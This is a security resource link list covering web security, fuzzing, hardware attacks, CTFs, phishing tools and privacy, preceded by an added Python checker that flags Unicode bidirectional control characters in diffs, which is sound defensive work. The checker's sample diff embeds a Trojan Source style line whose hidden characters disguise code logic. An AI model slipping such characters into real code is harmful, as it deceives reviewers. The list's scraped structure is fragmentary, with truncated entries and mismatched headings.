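The check described by the "Trojan Source" and "Warn users when a PR contains some characters" entries above, written out as an added example (it is not the PR's code nor the paper's): it scans only the lines a diff adds for Unicode bidirectional control characters and reports their position and name. The watch-list dict, the `scan_diff` function and `SAMPLE_DIFF` are constructed for this example; the list is a plain dict precisely so a project can extend it the way the PR's configurable list allows.

```python
"""Flag Unicode bidirectional control characters in the added lines of a PR diff.

Added example; not code from the linked PR or the Trojan Source paper.
The watch-list is a plain dict so a project can extend it. SAMPLE_DIFF is a
constructed diff: the added comment renders harmlessly, but the RLO/LRI pair
reorders what a reviewer sees versus what the compiler parses.
"""

# Default watch-list: the Unicode bidi formatting characters Trojan Source abuses.
# Assumption: a reasonable starting list; extend it (e.g. zero-width chars) as needed.
BIDI_CONTROLS = {
    "\u202a": "LEFT-TO-RIGHT EMBEDDING",
    "\u202b": "RIGHT-TO-LEFT EMBEDDING",
    "\u202c": "POP DIRECTIONAL FORMATTING",
    "\u202d": "LEFT-TO-RIGHT OVERRIDE",
    "\u202e": "RIGHT-TO-LEFT OVERRIDE",
    "\u2066": "LEFT-TO-RIGHT ISOLATE",
    "\u2067": "RIGHT-TO-LEFT ISOLATE",
    "\u2068": "FIRST STRONG ISOLATE",
    "\u2069": "POP DIRECTIONAL ISOLATE",
}

# Constructed sample diff (unified format), one added line carrying RLO + LRI.
SAMPLE_DIFF = (
    "--- a/access.py\n"
    "+++ b/access.py\n"
    "@@ -1,2 +1,3 @@\n"
    " def check(user):\n"
    "+    # Test access level \u202e { if user.is_admin \u2066\n"
    "     return False\n"
)


def find_hidden_chars(text, watch=None):
    """Return (line_no, col, codepoint, name) for every watched character in text.
    Line numbers are 1-based; columns are 0-based character offsets."""
    watch = BIDI_CONTROLS if watch is None else watch
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line):
            if ch in watch:
                hits.append((line_no, col, "U+%04X" % ord(ch), watch[ch]))
    return hits


def scan_diff(diff, watch=None):
    """Scan only the lines a PR adds: '+' lines, excluding the '+++' file header.
    Returns (diff_line_no, col, codepoint, name) tuples; an empty list means clean."""
    watch = BIDI_CONTROLS if watch is None else watch
    hits = []
    for line_no, line in enumerate(diff.splitlines(), start=1):
        if not line.startswith("+") or line.startswith("+++"):
            continue
        hits.extend((line_no, col, cp, name)
                    for _, col, cp, name in find_hidden_chars(line, watch))
    return hits


def review_warning(diff, watch=None):
    """Human-readable warning text for a PR check, or '' if nothing was found."""
    return "\n".join("line %d col %d: %s %s" % h for h in scan_diff(diff, watch))


if __name__ == "__main__":
    print(review_warning(SAMPLE_DIFF) or "clean")
```

Removed lines are deliberately ignored so that a PR which deletes a bidi character does not trip the warning; a project that wants to block the characters outright rather than warn can fail the check whenever `scan_diff` returns a non-empty list.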
Secure Web dev
- Introduction to OWASP Top 10 2021
- OWASP Web Security Testing Guide - project-web-security-testing-guide/)
- Projects/OWASP Node js Goat Project
- OWASP Risk Assessment Calculator - Calculator)
- OWASP Top 10 Proactive Controls 2018
- OWASP-Web-Checklist
- Exploiting OWASP Top 10 API Vulnerabilities
- CheatSheetSeries
- Password Storage Cheat Sheet
- Database Security Cheat Sheet
- OWASP Cornucopia
- The 2021 CWE Most Important Hardware Weaknesses
- secDevLabs
- Secure Modular Runtimes
- WebSecurity Academy
- Prototype pollution – and bypassing client-side HTML sanitizers
- Understanding the CSRF Vulnerability (A Beginner’s Guide)
- VulnyCode
- PwnMachine
- WebSploit Labs
- Introduction - OWASP Cheat Sheet Series
- Stop Password Masking
- Forgot password? Taking over user accounts Kaminsky style
- CWE Top 25 Most Dangerous Software Weaknesses
- Datashare Server Mode
- GitLab analysis of OWASP Top 10 changes from 2004 to 2021
- oxAuth
- Prototype Pollution in Python
- OWASP-Testing-Checklist
-
Web Training
-
Formal Analysis
- A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs - Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)
- SCYTHE's Community Threats Repository
-
Fuzzing
- afl-unicorn
- Regaxor
- BrokenType
- Dizzy-legacy
- Start-Hollow.ps1
- auditd-attack
- Structure-Aware Fuzzing with libFuzzer - test-suite)
- Generating Software Tests - se/fuzzingbook/))
- Fuzzilli
- Materials from Fuzzing Bay Area meetups
- javafuzz - guided fuzzer for testing Java packages.
- onefuzz - hosted Fuzzing-As-A-Service platform.
- Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
- rFuss2
- RESTler finds security and reliability bugs through automated fuzzing - fuzzer): is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. [REST API Fuzz Testing (RAFT)](https://github.com/microsoft/rest-api-fuzz-testing): Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
- Dynamic Program Analysis
- Fuzzing the Linux Kernel
- Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
- Fuzzing-101
- The Challenges of Fuzzing 5G Protocols
- Fuzzing Workshops
- Introduction to VirtualBox security research
- sandsifter
-
-
CVEs
-
Hashing
- here
- MikroTik
- Exploit Prediction Scoring System (EPSS) - driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
- here
- TROMMEL
- cve_manager
- dorkbot - line tool to scan Google search results for vulnerabilities.
- NotQuite0DayFriday
- CVE PoC
-
-
Patching
-
Ghidra
- They Did - 2017-11882)
-
-
Hardening
-
Ghidra
- BlueWars
- Get SSH login notification on Telegram
- Implementing Least-Privilege Administrative Models
- Keyringer
- Keystone Project - enclave/)
- nftables
- Common approaches to securing Linux servers and what runs on them.
- Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
- Secure Secure Shell
- Securing Docker Containers - practices around deploying Docker containers in production.](https://github.com/docker/docker-bench-security)
- Hardenize
- Set up two-factor authentication for SSH on Fedora
- Zero-knowledge attestation
- Reverie - knowledge proof system.
- bdshemu
- IPv6 Security Best Practices
- Hardened/PaX Quickstart
- 9 Kubernetes Security Best Practices Everyone Must Follow
- Learn and Test DMARC
- VideoLan Robots.txt
- ssh & linux cheat sheets
- NSA/CISA Kubernetes Hardening Guidance
-
WebServers
- Apache Tomcat Hardening and Security Guide
- How to Configure SSL Certificate on Google Cloud Load Balancer?
- Nginx Web Server Security & Hardening Guide
- IBM HTTP Server Security & Hardening Guide
- How to Enable TLS 1.3 in Nginx, Cloudflare?
- Apache Web Server Hardening & Security Guide
- List of free rfc3161 servers.
- Apache Security
- A new security header: Feature Policy
- How do I prevent apache from serving the .git directory?
- Nginx C function
- NGINX config for SSL with Let's Encrypt certs
- How to Configure Nginx SSL Certificate Chain
- It's All About Time - A tool for performing feasibility analyses of timing attacks. [TimingIntrusionTool5000](https://github.com/aj-code/TimingIntrusionTool5000): A tool for performing network timing attacks on plaintext and hashed password authentication.
- Decode.Tools
- IT Security Guidelines for Transport Layer Security (TLS)
- CAA Mandated by CA/Browser Forum
- ENVOY - native applications. [code](https://github.com/envoyproxy/envoy)
- NFHTTP
- Security/Server Side TLS
- urlscan.io
- QUIC's combined transport and cryptographic handshake makes it 1 round trip faster than TCP + TLS, and its main problems.
- HTTP/2: The Sequel is Always Worse - 21/briefings/schedule/#http2-the-sequel-is-always-worse-22668)
- A File Format to Aid in Security Vulnerability Disclosure
- security.txt
- 20 Essential Things to Know if You’re on Nginx Web Server
-
-
Tools
-
Satellite
- Using a Hardened Container Image for Secure Applications in the Cloud
- trackerjacker
- Giggity
- bettercap
- Vapor PwnedPasswords Provider
- XPoCe - XPC Snooping utilities for MacOS and iOS (version 2.0)
- WeakNet LINUX 8 - security themed distribution that has been in development since 2010.
- HiTB
- Google Chromium
- openvotenetwork
- Tools by Morphus Labs
- Stratosphere IPS
- Convert nmap Scans into Beautiful HTML Pages
- GeoInt
- nipe
- solo
- Joint Report On Publicly Available Hacking Tools
- Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
- Command-Line Snippets - line commands that make your life easier.
- IP-to-ASN - Team Cymru
- free Entropy Service
- Correct Horse Battery Staple
- Hostintel - [github](https://github.com/keithjjones/hostintel)
- commando packages
- Introducing Inkdrop 4
- how we uncovered an attack on government entities in Europe
- inlets
- Cloning a MAC address to bypass a captive portal
- Open Steno Project
- Machine Learning on Encrypted Data Without Decrypting It
- Raspberry pi as poor man’s hardware hacking tool
- VoightKampff
- John the Ripper in the cloud
- SpamCop
- Rawsec's CyberSecurity Inventory - cybersecurity-inventory)
- gaijin tools
- glsnip
- CERTrating - tool.html)
- Cybersecurity Maturity Model Certification (CMMC)
- What is the Cybersecurity Maturity Model Certification (CMMC)
- Who needs to have Cybersecurity Maturity Model Certification (CMMC)
- Find Virtual Hosts for Any IP Address
- Security Tools
- Gamifying machine learning for stronger security and AI models
- BashScan
- Ronin
- SubSeven is Back - made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required.
- freedomfighting
-
Note-taking
- cherrytree
- obsidian
- CudaText - T/CudaText)
- Compare AsciiDoc and Markdown
-
IP Reputation
-
Shell tools
-
Search Engines
- DarkSearch - the-1st-real-search-engine-dark-web-darksearch-vs-ahmia-84852fd4c51b)
- Search engines for Hackers
- censys.io
- shodan.io
- TriOp
- viz.greynoise.io
- zoomeye.org
- wigle.net
- publicwww.com
- hunter.io
- haveibeenpwned.com
- haveibeenEMOTET
- thispersondoesnotexist.com
- osintframework.com
- NAPALM FTP Indexer
- Insecam
-
VPN
- jigsaw project - Code/outline-server): VPN Server.
- WireGuard - of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
- Crockford’s base 32 encoding
- Sputnik - An Open Source Intelligence Browser Extension
- uncaptcha2
- AirVPN
- Build your own private WireGuard VPN with PiVPN
- PCredz - RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
-
Secure Sharing
- Cryptomator - platform transparent client-side encryption of your files in the cloud. [code](https://github.com/cryptomator/cryptomator)
- VeraCrypt
- CipherShed
- DiskCryptor
-
-
Archs
-
Hardware
- SkyJack
- Wifi-Ducky-ESPUSB
- USB Attacks: Past, Present and Future - VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
- PLATYPUS - based power side-channel attacks on Intel server, desktop and laptop CPUs.
- VoltPillager - based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- ToorCon 14 Badge
- HammerKit - source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms.
- Evil Logitech - erm I meant USB cable. [USB Samurai](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b?gi=ade3f719f778) [For Dummies](https://infosecwriteups.com/usbsamurai-for-dummies-4bd47abf8f87)
- Hacker's guide to deep-learning side-channel attacks: the theory
- Guarding Against Physical Attacks: The Xbox One Story
- Common BMC vulnerabilities and how to avoid repeating them - 18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf) [Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers](https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/)
- BrakTooth
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- The Practical Guide to Hacking Bluetooth Low Energy
- A Practical Guide to BLE Throughput
- Exploiting IoT enabled BLE smart bulb security
- Airspy-Utils
- Cracking WiFi at Scale with One Simple Trick
- hcxdumptool
- eaphammer - Enterprise networks. Indirect wireless pivots using hostile portal attacks.
- whereami
- Car hijacking swapping a single bit
- Hacking a VW Golf Power Steering ECU - Part 1, [Part 2](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part2/) [Part 3](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part3/) and [Part 4](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part4/). [VW PQ35 EPS flasher](https://github.com/pd0wm/pq-flasher)
- Hacking Printers Wiki
- Full key extraction of NVIDIA™ TSEC
- The x86 architecture is the weirdo, part 2
- Reverse Engineering Yaesu FT-70D Firmware Encryption
- Reverse-engineering an airspeed/Mach indicator from 1977
- Stepping Insyde System Management Mode
- BMC-Tools
-
CTFs tools
- LAB ENVIRONMENT
- HUB
- arm vm working out of the box for everyone
- Statically compiled ARM binaries for debugging and runtime analysis.
- Hacker Finds Hidden 'God Mode' on Old x86 CPUs - > [rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge): Hardware backdoors in some x86 CPUs
- USBHarpoon
- A 2018 practical guide to hacking RFID/NFC
- riscv-ida - V ISA processor module for IDAPro 7.x
- mac-age
- IntelTEX-PoC
- me_cleaner
- Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
- IDA-scripts
- Something about IR optimization
- Dragonblood
- Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
- Extracting seed from Ellipal wallet
- Breaking Trezor One with Side Channel Attacks
- Rewriting Functions in Compiled Binaries
- Deep Dive
- Saleae
- wacker
- Osiris
- One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization
- Patching Binaries with Radare2 - ARM64
- Lexra - bit variant of the MIPS architecture.
- The Hacker's Hardware Toolkit
-
ARM
- AZM Online Arm Assembler
- Understanding the Glibc Heap Implementation
- Understanding the GLIBC Heap Implementation
- Heap Exploit Development - the-wild iOS 0-day. [thread](https://threader.app/thread/1168969597799866368)
- ARM64 Reversing and Exploitation
- ARM Instruction Set + Simple Heap Overflow
- Use After Free
- A Simple ROP Chain
-
-
Credentials
-
WebServers
- XSS Exploit code for retrieving passwords stored in a Password Vault
- Was my password leaked?
- bitwarden_rs
- Depix
- Launch PowerShell Script From Within KeePass And Include Password Secure String Credential - for-keepass-password-manager/), [PowerShell KeePass](https://github.com/PSKeePass/PoShKeePass).
- WhiteIntel
-
Tokens
- Introducing the Qubes U2F Proxy
- Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
- Using a Yubikey for GPG and SSH - 0day.work
- PIN and Management Key
- Improve login security with challenge-response authentication
- URU Card - card](https://github.com/uru-card/uru-card)
- yubikey-ssh-setup
-
-
CTFs
-
API
- Deploying CTFd
- CTFd Tips
- SA-ctf_scoreboard
- The fast, easy, and affordable way to train your hacking skills.
- Write-ups for crackmes and CTF challenges
- $50 million CTF Writeup
- Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, transform the given diophantine equation into a cubic curve and retrieve the EC parameters, solve the ECDLP given in the extracted data using the Pohlig-Hellman algorithm.
- RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
- BalsnCTF-2019
- FIRST SecLounge CTF 2020 Solutions
- Hitcon2017CTF - 家徒四壁~Everlasting Imaginative Void~
- Closing Capture the Flag Session & Winning Team Presentation
- Capture the Flag
- DEF CON CTF 2021 QUALS - ctf-2021-finals/), [files](https://github.com/o-o-overflow)
- eDump
- RET2 WarGames
- CTF: Learn "hacking" by playing
- HackLab #1
- Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle
- Pwn2Win 2018 - pt1.txt)
- Leap Security
- 35c3ctf-challs
- ctf-tasks - level CTF challenges developed over the years.
- HackTheBox CTF Cheatsheet
- Mumbai:1 Vulnhub Walkthrough
- 0x0G 2020 CTF
- r2dec
- SASatHome
- Crypton
- Bash injection without letters or numbers - 33c3ctf hohoho
- Writeup CTF - Web API Exploitation
- attack & defense CTF demo
- CTF-Writeups
- HITB SECCCONF EDU CTF 2021
- CTF KAVACON 21 – RED LIGHT, GREEN LIGHT
- Penetration testing laboratories "Test lab"
-
CTFs tools
- CTFs-Exploits
- nc-chat-ctf
- thg-framework
- Super-Guesser-ctf
- Ciphr - army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
- Real World CTF 2023
-
-
Phreak
-
CTFs tools
- Into the wild: Gaining access to SS7 - Part 1: Finding an access point
- SCTP/SIGTRAN & SS7 Overview
- Security Penetration Test Framework for the Diameter Protocol
- Signaling Security in LTE Roaming
- Phrack
-
-
Phishing
-
Steganography
- Phishing on Twitter
- shellphish
- pompa - featured spear-phishing toolkit - web front-end.
- Using phishing tools against the phishers
- Lure
- PhishingKitTracker
- SimplyTemplate
- Compromising operating systems through fake software updates
- MurmurHash
- SniperPhish - Email Spear Phishing Toolkit
- phishing-frenzy
- ThePhish
- Phishing 101: why depend on one suspicious message subject when you can use many?
- Widespread credential phishing campaign abuses open redirector links
-
-
Risk Assessment and Vulnerability Management
-
AWS
- Cyber Risk Management
- RITA (Real Intelligence Threat Analytics)
- Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash
- ISO27001 audit in real-time....
- Gearing Towards Your Next Audit
- Nuclei unleashed - writing first exploit
- Secure design principles
- Risk Assessment of GitHub Copilot
- ISA/IEC 62443
- Understanding IEC 62443
- NERC CIP
- Threat Modeling Manifesto
- Risk Management Framework for Systems and Organizations Introductory Course
-
Guidelines
-
-
ICS (SCADA)
-
Guidelines
- THE RACE TO NATIVE CODE EXECUTION IN PLCS
- The Top 20 Secure PLC Coding Practices Project
- IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems
- Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements
- IEEE C37.118 protocol
- IEEE C37.118 Synchrophasor Protocol - wireshark wiki
- INFRA:HALT
- Findings From Examining More Than a Decade of Public ICS/OT Exploits
- ATT&CK® for Industrial Control Systems
-
-
Radio
-
Guidelines
- Qualcomm chain-of-trust
- Presenting QCSuper - based phones. [github](https://github.com/P1sec/QCSuper)
- Logitech keyboards and mice vulnerable to extensive cyber attacks
- A look at GSM
- srsLTE
- List of software-defined radios
- Spectrum Analyzers, Linux
- Sonic Visualiser
- spek
- SpectMorph
- The LibreCellular project - defined radio (SDR) hardware.
-
Satellite
-
-
Social Engineering
-
Satellite
- The Basics of Social Engineering
- Never Split the Difference - Chris Voss
- The Charisma Myth - Olivia Fox Cabane
- Hacking the Human - Ian Mann
- Chris Hadnagy
- Joe Navarro
-
-
Privacy
-
Secure Sharing
- Everything Old is New Part 2: Why Online Anonymity Matters
- Data Security on Mobile Devices
- TorBox Wireless Manager
- The Instagram ads Facebook won't show you
- 4TB of stolen identities are being circulated online following a breach on Oriflame
- How to choose a browser for everyday use?, [E-mail providers - which one to choose?](https://digdeeper.neocities.org/ghost/email.html) and [Search Engines - which one to choose?](https://digdeeper.neocities.org/ghost/search.html)
- Disinformation guru “Hacker X” names his employer: NaturalNews.com
- Hey Siri, Find My Ex - Enabled Abuse in the Apple Ecosystem.
- Keyhole Imaging
- Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared
- Global Presence of Authoritarian Tech
- Zooming in on Zero-click Exploits
- Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response.
- Anyone can use this powerful facial-recognition tool — and that's a problem
- Using “Master Faces” to Bypass Face-Recognition Authenticating Systems - paper: [Generating Master Faces for Dictionary Attacks with a Network-Assisted Latent Space Evolution](https://arxiv.org/pdf/2108.01077.pdf), two [other](https://gizmodo.com/master-face-researchers-say-theyve-found-a-wildly-succ-1847420710) [news](https://www.unite.ai/master-faces-that-can-bypass-over-40-of-facial-id-authentication-systems/)
- Forensic Methodology Report: How to catch NSO Group’s Pegasus
- Who is being monitored?
General
- Thomas Roccia's #100DaysOfCode challenge
- Examples of regular expressions
- Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
- Looking for value in EV Certificates
- How to find hidden cameras
- Our latest updates on Fully Homomorphic Encryption - homomorphic-encryption)
- Introducing Certificate Transparency and Nimbus
- A Few Thoughts on Cryptographic Engineering
- Mailfence
- Threat Hunting Workshop - Methodologies for Threat Analysis
- The Illustrated TLS Connection
- Practical Cryptography
- Thieves and Geeks: Russian and Chinese Hacking Communities
- HTTP/3 Explained - [github](https://github.com/bagder/http3-explained)/[http2 explained](https://daniel.haxx.se/http2/) - [github](https://github.com/bagder/http2-explained)
- Template for Data Protection Impact Assessment (DPIA)
- hash collisions
- Shodan - A tool for Security and Market Research
- Engineering Security
- Automatic SSL with Now and Let's Encrypt
- Hacking Digital Calipers
- Binary Hardening in IoT products
- Bolstering Security with Cyber Intelligence
- THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
- Explanatory Report to the Additional Protocol to the Convention on Cybercrime
- Audi A7 2014 MMI Mishandles the Format-string Specifiers
- BoF + Sockets + Encoding Errors with Python3
- List of Rainbow Tables
- Do you hear what I hear? A cyberattack.
- Ghost in the ethernet optic
- Russian Army information security posters
- Decent Security
Resources
Training and Certifications
- How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
- AWAE/OSWE
- From AWAE to OSWE: The Preparation Guide
- Security Certification Progress Chart
- Hacking Your Pen Testing / Red Teaming Career: Part 1
- PentesterAcademy
- RED TEAM Operator: Malware Development Essentials Course - maldev-intermediate)
- OSCP Journey
- Hacking Dojo
- Learning from your mistakes as an offensive security professional
- The Ultimate List of SANS Cheat Sheets
- Posters: Pen Testing
- #OSCP exam advice thread.
- Targeted Malware Reverse Engineering Workshop
- OpenSecurity
- OPSEC: In Theory and Practice
- Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etc.
- Free Incident Response Training Plan - ir-training-plan-part-two). [BaselineTraining](https://github.com/rj-chap/BaselineTraining): Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk.
- CyberDefenders
- SOC Core Skills w/ John Strand
- OSCP - My path to the promised land.
- Burp Suite Academy
Configs
- 13 Best New Software Security Books To Read In 2021
- 'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. The main purpose of pwnable.kr is 'fun'.
- Pwnable.tw
- Security Zines
- pwn.college is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”.
Conferences and Slides
- H2HC - Hackers To Hackers Conference:
- H2HC 2021
- Modchips of the State - chain - CCC 2018
- Cybersecurity as Realpolitik
- Expert demonstrated a new PHP code execution attack
- supply chain issues talk
- MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets
- Doublethink - Architecture Assembly Polyglot by Robert Xiao
- SAFEMODE - safemode/dc-safemode-villages.html), [BADGE](https://www.defcon.org/html/defcon-safemode/dc-safemode-badge.html), [ics-forum](https://forum.defcon.org/node/232698)
- OpenSOC Blue Team CTF @ DEFCON 29 FAQ
- Using Barq to perform AWS Post-Exploitation Actions
- SBSeg 2018
- APFS Internals - Jonathan Levin
- Protecting the Garden of Eden - Patrick Wardle
- Code signing flaw in macOS - Thomas Reed
- From Apple Seeds to Apple Pie - Sarah Edwards
- When Macs Come Under ATT&CK - Richie Cyrus
- Crashing to Root - Brandon Azad
- Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
- MacDoored - Jaron Bradley
- Who Moved my Pixels? - Mikhail Sosonkin
- Aliens Among Us - Michael Lynn
- r2con2020
- r2con2020 DAY3 Live Stream
- MISP Summit 05
- Hack.lu 2019 Day #1 Wrap-Up
- The Open Source Security Software
- Hack.lu 2021 Stonks Socket
- How to R&D hacking toys for fun & no-profit
- Security Guidelines for Congressional Campaigns
- From Assembly to JavaScript and back
- ARM-based IoT Exploit Development
- An Introduction to Threat Intelligence and Threat Hunting for Companies Without an Infinite Budget
- The Art of De-obfuscation
- Smartphone Privacy
- Fun with LDAP and Kerberos- in AD environments
- Analysis and recommendations for standardization in penetration testing and vulnerability assessment
- The Second Crypto War—What's Different Now
- Malware: Anti-forensics
- The 35C3 halfnarp
- SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
- Mojave's Sandbox is Leaky
- Code Obfuscation 10**2+(2*a+3)%2
- DeepState - 2018-paper.pdf): DeepState: Symbolic Unit Testing for C and C++
- Hardware Memory Tagging to make C/C++ memory safe(r)
- wallet.fail
- Making C Less Dangerous in the Linux kernel
- A Practical Approach to Purple Teaming
- The Advanced Threats Evolution: REsearchers Arm Race
- The Beginner Malware Analysis Course + VirusBay Access
- Venturing into the Dark - a review of Dark Side Ops 2: Adversary Simulation
- Expert voices disinvited from CyberCon
- Offensive Development - Exploitation Tradecraft in an EDR World x33fcon 2020
- The AVAR International Conference is back!
- Japan Security Analyst Conference Virtual Edition
- Developing Secure Systems Summit (DS3)
- MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE - Amsterdam
- Securing Cyber-Physical Systems: moving beyond fear
- TheGlasshouseCtr
- Open Source Security Day on Google Open Source Live
- 30th USENIX Security Symposium
- The Hijackers Guide to the Galaxy:Off-path Taking over Internet Resources
- Reverse Engineering - - Thomas Dullien (“Halvar Flake”)
- JavaDeserH2HC
Sans
- April 2021 Forensic Quiz - [April-2021-forensic-quiz](https://github.com/brad-duncan/April-2021-forensic-quiz)
- May 2021 Forensic Contest - [May-2021-forensic-quiz](https://github.com/brad-duncan/May-2021-forensic-quiz) [answer](https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest+Answers+and+Analysis/27430/)
- June 2021 Forensic Contest - [June-2021-forensic-quiz](https://github.com/brad-duncan/June-2021-forensic-quiz) [Network Forensics on Azure VMs (Part #2)](https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/).
- Quick Analysis of a Modular InfoStealer
- Example of Cleartext Cobalt Strike Traffic
- "Serverless" Phishing Campaign
- SANS Virtual Summits Will Be FREE for the Community in 2021
- Random Forests: Still Useful?
Sources
- FIDO ECDAA Algorithm
- stamparm
- gabrielmachado
- Damn Vulnerable Web Application Docker container
- vvmlist
- PwnLab: init
- Mamont's open FTP Index
- Free Training: New Certified Learning Paths
- Daily Information Security Podcast ("StormCast")
- I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster - Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization.
- Exodus Research Community
- 2021 Annual Threat Assessment
- EP 67: THE BIG HOUSE
- List of Helpful Information Security Multimedia
- hasherezade's 1001 nights
- How to start RE/malware analysis? | hasherezade's 1001 nights
- Fraud Catalog (Catálogo de Fraudes)
- Wrong Secrets
Fun
- InfoSec BS Bingo
- Attrition.org
- rot8000
- Reverse Engineering Pokémon GO Plus
- grugq quotes
- Pivots & Payloads Board Game
- Chess Steganography
- Enigma, the Bombe, and Typex
- Enigma machine
- How I hacked modern Vending Machines
- A better zip bomb
- Enigma I - emulator).
- FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases
- pivoting
- "Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
- THE BEIRUT BANK JOB
- types of papers
- Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data.
- How the Xbox 360 DVD Security was Defeated - MVG
- I was going through my notes this morning and thought CVE-2021-21985 was important to cover
- APPSEC EZINE
- ZeroVer: 0-based Versioning
- The Cartoon Guide to Computer Science
- LENS CALCULATOR
- An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
- What is von Clausewitz centers of gravity (cogs) concept?
- Place where a stealth fighter was caught on Google Maps
- High-Security Mechanical Locks
- Tetsuji
- Comparative Study of Anti-cheat Methods in Video Games
- An icon of WWII cryptography, the Enigma machine has a specimen in Brazil
Articles
- [1808.00659
- [1809.08325
- DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
- The Hunt for 3ve
- Page Cache Attacks - a hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
- Identification and Illustration of Insecure Direct Object References and their Countermeasures
- China’s Maxim
- Listen to Your Key: Towards Acoustics-based Physical Key Inference
- Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
- Everything Old is New Again: Binary Security of WebAssembly
- Discovering Suspicious APT Behaviors by Analyzing DNS Activities
- Harvard Belfer National Cyber Power Index 2020
- Quantum Blockchain using entanglement in time
- Reflections on Trusting Trust
- I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches
- BIAS: Bluetooth Impersonation AttackS
- LOKI: Hardening Code Obfuscation Against Automated Attacks
- FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications
- Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
- The Accidental Altruist: Inferring Altruism from an Extraterrestrial Signal
psyops